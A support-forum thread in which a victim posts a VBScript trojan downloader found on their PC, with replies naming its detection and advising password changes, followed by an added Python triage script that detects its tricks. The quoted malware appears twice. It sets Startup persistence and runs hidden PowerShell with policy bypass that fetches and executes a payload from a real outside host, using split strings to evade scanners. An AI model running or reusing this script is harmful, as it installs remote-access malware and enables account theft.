
What is this virus and how can I go about cleaning?


NotMikaa

Hi!

So I came about this being dumb and installed it.
Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail.
They've already looked into my PayPal.

 

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 


  • Administrators

A detection was added several days ago; the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.


  • Most Valued Members
On 12/1/2019 at 7:58 AM, NotMikaa said:

Hi!

So I came about this being dumb and installed it.
Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail.
They've already looked into my PayPal.

 


dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is.

Put a good password and limit access only to your PCs.

Because they have got access to several accounts of yours, you should change all passwords now, and secure them with 2-step verification for more secure entry to your accounts.

Edited by Rami

This topic is now closed to further replies.
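
Added example, not part of any post in this thread and not the vendor's detection logic: a small Python triage that first folds the VBScript `"..." & "..."` string splitting seen in the posted script (`"powers" & "hell"`, `'htt" & "p://"`) and then flags the behaviours visible in it (Startup-folder copy, hidden PowerShell with policy bypass, download followed by `IEX`). The rule names, the helper functions and the sample's placeholder URL are assumptions made for illustration.

```python
import re

# Constructed sample modelled on the script in this thread; the URL is a placeholder.
SAMPLE = r'''
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -command $c = New-Object System.Net.WebClient;$s = $c.OpenRead('htt" & "p://" & "files.example.invalid/a.jpg');IEX $r", 0, true
'''

# Two adjacent VBS string literals joined with & : closing quote, &, opening quote.
CONCAT = re.compile(r'"\s*&\s*"')

# Hypothetical rule names; each pattern is matched against the folded text.
RULES = {
    "startup_persistence": r'specialfolders\s*\(\s*"startup"\s*\).*?copyfile',
    "powershell_policy_bypass": r'powershell\b.*?-executionpolicy\s+bypass',
    "hidden_window": r'-windowstyle\s+hidden',
    "download_and_execute":
        r'(webclient|downloadstring|openread).*?\b(iex|invoke-expression)\b',
}
URL = re.compile(r'https?://[^\s\'")]+', re.I)

def fold_concat(src):
    """Merge "a" & "b" into "ab" so split keywords and URLs become contiguous."""
    return CONCAT.sub("", src)

def defang(url):
    """Render a URL unclickable before it goes into a report or ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(src):
    """Return (matched rule names, defanged URLs) for a VBScript source string."""
    text = fold_concat(src)
    hits = [name for name, pat in RULES.items()
            if re.search(pat, text, re.I | re.S)]
    urls = sorted({defang(u) for u in URL.findall(text)})
    return hits, urls

if __name__ == "__main__":
    hits, urls = triage(SAMPLE)
    print("behaviours:", hits)
    print("urls:", urls)
```

Without the folding step, a plain search for `powershell` or `http://` in the raw script finds nothing, which is the reason the strings are split in the first place.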